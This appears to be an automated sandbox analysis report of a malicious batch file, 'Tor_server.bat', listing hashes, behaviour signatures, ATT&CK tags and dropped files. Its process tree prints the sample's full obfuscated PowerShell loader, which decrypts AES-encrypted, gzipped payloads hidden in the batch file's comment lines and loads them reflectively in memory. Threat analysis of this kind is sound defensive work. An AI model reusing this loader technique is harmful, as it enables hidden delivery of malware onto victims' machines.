4fa4c520361ee63e7d28a5a636bdd0cd20faf998d1561d38184904ea97e37e18

Analysis

max time kernel
53s
max time network
33s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
11-04-2023 20:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Tor_server.bat
Size

13.3MB
MD5

5b78770d26a9fd2865d946e15f6d3461
SHA1

54f53ee915d14564c306d085ec7a13f605248cf1
SHA256

4fa4c520361ee63e7d28a5a636bdd0cd20faf998d1561d38184904ea97e37e18
SHA512

afa04485c331796f399865c9e01763979a9c52236f2e8726352685be88f05c1cdc46f40b1366832a119872a025247cde158373d52c98ba40099a61658bdd161a
SSDEEP

49152:R8PZBvM7+OPeFknvKYEO5fkqB31m3Ei+vrojMj1YqmyljkjK5qGiuJ6hpTlNJkvM:i

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
576	Tor_server.bat.exe

Loads dropped DLL 1 IoCs

pid	Process
1104	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
576	Tor_server.bat.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	576	Tor_server.bat.exe
Token: 33	1492	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1492	AUDIODG.EXE
Token: 33	1492	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1492	AUDIODG.EXE

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1104 wrote to memory of 576	1104	cmd.exe	31
PID 1104 wrote to memory of 576	1104	cmd.exe	31
PID 1104 wrote to memory of 576	1104	cmd.exe	31

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Tor_server.bat"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1104
- C:\Users\Admin\AppData\Local\Temp\Tor_server.bat.exe
  "Tor_server.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function uuyaK($wQlbu){ $Egnpc=[System.Security.Cryptography.Aes]::Create(); $Egnpc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Egnpc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Egnpc.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('utt18sMXths75eOv2gaMm/uDEi56oUhkOfCdq6XsWl4='); $Egnpc.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UAhcHc4T2j6r3WvRbQ2hYQ=='); $KyoMC=$Egnpc.CreateDecryptor(); $return_var=$KyoMC.TransformFinalBlock($wQlbu, 0, $wQlbu.Length); $KyoMC.Dispose(); $Egnpc.Dispose(); $return_var;}function HEAnP($wQlbu){ $Anixn=New-Object System.IO.MemoryStream(,$wQlbu); $lwnyf=New-Object System.IO.MemoryStream; $zWCNb=New-Object System.IO.Compression.GZipStream($Anixn, [IO.Compression.CompressionMode]::Decompress); $zWCNb.CopyTo($lwnyf); $zWCNb.Dispose(); $Anixn.Dispose(); $lwnyf.Dispose(); $lwnyf.ToArray();}function yUxUM($wQlbu,$cKmgu){ $nmDQR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$wQlbu); $PBuhY=$nmDQR.EntryPoint; $PBuhY.Invoke($null, $cKmgu);}$DeBef=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Tor_server.bat').Split([Environment]::NewLine);foreach ($Iexhf in $DeBef) { if ($Iexhf.StartsWith(':: ')) { $AYYIU=$Iexhf.Substring(3); break; }}$YSbzR=[string[]]$AYYIU.Split('\');$vklec=HEAnP (uuyaK ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($YSbzR[0])));$OKwsG=HEAnP (uuyaK ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($YSbzR[1])));yUxUM $OKwsG (,[string[]] (''));yUxUM $vklec (,[string[]] (''));
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:576

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:928

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x570
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1492

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Tor_server.bat.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
\Users\Admin\AppData\Local\Temp\Tor_server.bat.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/576-59-0x000000001B050000-0x000000001B332000-memory.dmp

Filesize
2.9MB

Download
memory/576-60-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

Filesize
32KB

Download
memory/576-61-0x0000000002490000-0x0000000002510000-memory.dmp

Filesize
512KB

Download
memory/576-62-0x0000000002490000-0x0000000002510000-memory.dmp

Filesize
512KB

Download
memory/576-64-0x000000000249B000-0x00000000024D2000-memory.dmp

Filesize
220KB

Download
memory/576-63-0x0000000002490000-0x0000000002510000-memory.dmp

Filesize
512KB

Download
memory/576-65-0x0000000002490000-0x0000000002510000-memory.dmp

Filesize
512KB

Download